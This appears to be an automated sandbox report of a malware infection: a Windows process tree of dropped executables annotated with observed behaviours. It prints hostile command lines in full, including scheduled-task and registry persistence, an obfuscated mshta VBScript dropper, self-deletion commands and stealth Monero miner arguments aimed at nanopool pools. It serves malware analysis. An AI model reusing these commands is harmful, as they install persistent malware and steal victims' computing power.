C:\Users\Admin\AppData\Local\Temp\SMart.exe"C:\Users\Admin\AppData\Local\Temp\SMart.exe"10⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws110⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7884 -s 30011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"10⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a11⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe"C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72110⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FBL2N.tmp\IBInstaller_74449.tmp"C:\Users\Admin\AppData\Local\Temp\is-FBL2N.tmp\IBInstaller_74449.tmp" /SL5="$503C0,14744148,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72111⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-2BOT2.tmp\{app}\microsoft.cab -F:* %ProgramData%12⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-2BOT2.tmp\{app}\microsoft.cab -F:* C:\ProgramData13⤵
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f12⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f13⤵
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"12⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://abelo40295gorr.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=72112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://abelo40295gorr.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e78c46f8,0x7ff9e78c4708,0x7ff9e78c471814⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2BOT2.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-2BOT2.tmp\{app}\vdi_compiler"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 29613⤵
- Program crash
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72010⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IJ3A5.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-IJ3A5.tmp\vpn.tmp" /SL5="$20356,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72011⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "12⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090113⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "12⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090113⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall12⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install12⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe"C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe" SID=717 CID=717 SILENT=1 /quiet10⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631171494 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"11⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 167211⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 29611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"10⤵
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 10011⤵
- Runs ping.exe
-
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 90011⤵
- Runs ping.exe
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8ACGJ.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-8ACGJ.tmp\stats.tmp" /SL5="$303DA,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-OGC4O.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OGC4O.tmp\Setup.exe" /Verysilent11⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit12⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'13⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit13⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'14⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵
-
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth13⤵
-
-
-
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lr4rufic.zyv\anyname.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\lr4rufic.zyv\anyname.exeC:\Users\Admin\AppData\Local\Temp\lr4rufic.zyv\anyname.exe6⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bruhfcfp.v5a\gcleaner.exe /mixfive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\bruhfcfp.v5a\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\bruhfcfp.v5a\gcleaner.exe /mixfive6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nxkkjaat.cqz\bumperWW1.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\nxkkjaat.cqz\bumperWW1.exeC:\Users\Admin\AppData\Local\Temp\nxkkjaat.cqz\bumperWW1.exe6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Users\Admin\Documents\5Zau_9xuT5qcQNWZifWoMA5p.exe"C:\Users\Admin\Documents\5Zau_9xuT5qcQNWZifWoMA5p.exe"7⤵
-
C:\Users\Admin\Documents\5Zau_9xuT5qcQNWZifWoMA5p.exe"C:\Users\Admin\Documents\5Zau_9xuT5qcQNWZifWoMA5p.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Documents\TD8LuB6JXqC0VdCtFoI8uMA_.exe"C:\Users\Admin\Documents\TD8LuB6JXqC0VdCtFoI8uMA_.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 3088⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\CNGJEQwyjyt3bihakaeIKjuH.exe"C:\Users\Admin\Documents\CNGJEQwyjyt3bihakaeIKjuH.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\k67uGZWzSdPnHgWTNBuiSfkb.exe"C:\Users\Admin\Documents\k67uGZWzSdPnHgWTNBuiSfkb.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\PupkSZQY8T49QtcX36YUYTl8.exe"C:\Users\Admin\Documents\PupkSZQY8T49QtcX36YUYTl8.exe"7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\microsoftedge.exe"C:\Users\Admin\AppData\Local\Temp\microsoftedge.exe"8⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2496 -s 4689⤵
- Program crash
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\Documents\9kNOEW2HlefV0Jy021tnC2PR.exe"C:\Users\Admin\Documents\9kNOEW2HlefV0Jy021tnC2PR.exe"7⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\N5xZyXF1nBWCdTtPp1A4rcDI.exe"C:\Users\Admin\Documents\N5xZyXF1nBWCdTtPp1A4rcDI.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\fQEQ1VtCLgnM9cRbBOPJGyAr.exe"C:\Users\Admin\Documents\fQEQ1VtCLgnM9cRbBOPJGyAr.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\fQEQ1VtCLgnM9cRbBOPJGyAr.exe"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """" == """" for %A IN ( ""C:\Users\Admin\Documents\fQEQ1VtCLgnM9cRbBOPJGyAr.exe"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\fQEQ1VtCLgnM9cRbBOPJGyAr.exe"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "" == "" for %A IN ( "C:\Users\Admin\Documents\fQEQ1VtCLgnM9cRbBOPJGyAr.exe" ) do taskkill /f -im "%~nxA"9⤵
-
C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXEX4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV "" == """" for %A IN ( ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "-PXPoqL0iOUHHP7hXFattB5ZvsV " == "" for %A IN ( "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"12⤵
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj11⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "fQEQ1VtCLgnM9cRbBOPJGyAr.exe"10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Documents\5n8bk1AGJ1T0beOfCIcqcVjD.exe"C:\Users\Admin\Documents\5n8bk1AGJ1T0beOfCIcqcVjD.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 2408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\2mtq9yjs_lOAYQ1XOfsTpxUd.exe"C:\Users\Admin\Documents\2mtq9yjs_lOAYQ1XOfsTpxUd.exe"7⤵
- Adds Run key to start application
-
-
C:\Users\Admin\Documents\UzyBmITm2PKKuBkrB6oJj9MB.exe"C:\Users\Admin\Documents\UzyBmITm2PKKuBkrB6oJj9MB.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 2928⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\42XaVy4wq6Hm6J0j7ZjPBAzm.exe"C:\Users\Admin\Documents\42XaVy4wq6Hm6J0j7ZjPBAzm.exe"7⤵
- Loads dropped DLL
-
-
C:\Users\Admin\Documents\Adjz9MVoMeUX3ma0kPxl3WU8.exe"C:\Users\Admin\Documents\Adjz9MVoMeUX3ma0kPxl3WU8.exe"7⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\O8kLFaee4FX1n1VzYUyPaYCg.exe"C:\Users\Admin\Documents\O8kLFaee4FX1n1VzYUyPaYCg.exe"7⤵
-
-
C:\Users\Admin\Documents\dejAFoYXictO7kroHWjGjBWB.exe"C:\Users\Admin\Documents\dejAFoYXictO7kroHWjGjBWB.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"8⤵
-
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"8⤵
-
-
-
C:\Users\Admin\Documents\LjPDuquPOx2nsXK_587Bsnlj.exe"C:\Users\Admin\Documents\LjPDuquPOx2nsXK_587Bsnlj.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2848⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\xuB95W3JJqVJLgODwklaO1u5.exe"C:\Users\Admin\Documents\xuB95W3JJqVJLgODwklaO1u5.exe"7⤵
-
-
C:\Users\Admin\Documents\ZHoJ2t2zE9wrEj9ym0iAwvan.exe"C:\Users\Admin\Documents\ZHoJ2t2zE9wrEj9ym0iAwvan.exe"7⤵
-
-
C:\Users\Admin\Documents\3dDSGag35o_rjgp2DaXI6Q9O.exe"C:\Users\Admin\Documents\3dDSGag35o_rjgp2DaXI6Q9O.exe"7⤵
-
-
C:\Users\Admin\Documents\RLNGYrIU_PpHNvleyNjkbwZO.exe"C:\Users\Admin\Documents\RLNGYrIU_PpHNvleyNjkbwZO.exe"7⤵
- Adds Run key to start application
-
-
C:\Users\Admin\Documents\k__5uPtP59Idr5H1oGUtORrI.exe"C:\Users\Admin\Documents\k__5uPtP59Idr5H1oGUtORrI.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\oAKMJSHgXUZrB1Vr8Jj2XxWn.exe"C:\Users\Admin\Documents\oAKMJSHgXUZrB1Vr8Jj2XxWn.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 3128⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\ys1zm7SlH68y_gR8QcRfFyLL.exe"C:\Users\Admin\Documents\ys1zm7SlH68y_gR8QcRfFyLL.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 2808⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\1j_kB8NQDbU_Doih1DSQrtR3.exe"C:\Users\Admin\Documents\1j_kB8NQDbU_Doih1DSQrtR3.exe"7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\aO6xZc_x1Jd3f9zGP0VJRoLI.exe"C:\Users\Admin\Documents\aO6xZc_x1Jd3f9zGP0VJRoLI.exe"7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\DXiFqvfcgEctSx2QZLuDfRbq.exe"C:\Users\Admin\Documents\DXiFqvfcgEctSx2QZLuDfRbq.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\{42F768E5-CC55-4145-9E0B-B6F0844B52A2}\DXiFqvfcgEctSx2QZLuDfRbq.exeC:\Users\Admin\AppData\Local\Temp\{42F768E5-CC55-4145-9E0B-B6F0844B52A2}\DXiFqvfcgEctSx2QZLuDfRbq.exe /q"C:\Users\Admin\Documents\DXiFqvfcgEctSx2QZLuDfRbq.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{42F768E5-CC55-4145-9E0B-B6F0844B52A2}" /IS_temp8⤵
-
C:\Windows\SysWOW64\MSIEXEC.EXE"C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\AppData\Local\Downloaded Installations\{1AF874E8-B60B-4D74-97B3-5CC53DC87DBC}\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="DXiFqvfcgEctSx2QZLuDfRbq.exe"9⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\MSI473C.tmp"C:\Users\Admin\AppData\Local\Temp\MSI473C.tmp"10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\MSI473D.tmp"C:\Users\Admin\AppData\Local\Temp\MSI473D.tmp"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\MSI472B.tmp"C:\Users\Admin\AppData\Local\Temp\MSI472B.tmp"10⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
-
C:\Users\Admin\Documents\c12rRzgpyQFJbgmAO3Gv8uvA.exe"C:\Users\Admin\Documents\c12rRzgpyQFJbgmAO3Gv8uvA.exe"7⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Documents\QfmMFesZBZmztZUVF27sNeHD.exe"C:\Users\Admin\Documents\QfmMFesZBZmztZUVF27sNeHD.exe"7⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\of3eC4gN8wgIC8yPkUiz6VsV.exe"C:\Users\Admin\Documents\of3eC4gN8wgIC8yPkUiz6VsV.exe"7⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\of3eC4gN8wgIC8yPkUiz6VsV.exe"8⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK9⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\15wiqxqx.vrl\autosubplayer.exe /S & exit5⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\avbymexp.fp3\installer.exe /qn CAMPAIGN=654 & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\avbymexp.fp3\installer.exeC:\Users\Admin\AppData\Local\Temp\avbymexp.fp3\installer.exe /qn CAMPAIGN=6546⤵
- Executes dropped EXE
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\shkqymvq.nsa\app.exe /8-2222 & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\shkqymvq.nsa\app.exeC:\Users\Admin\AppData\Local\Temp\shkqymvq.nsa\app.exe /8-22226⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun05640630a6aa.exeSun05640630a6aa.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8DD7FFE3\Sun059375dac544fc4a.exeSun059375dac544fc4a.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'6⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5264 -s 16724⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
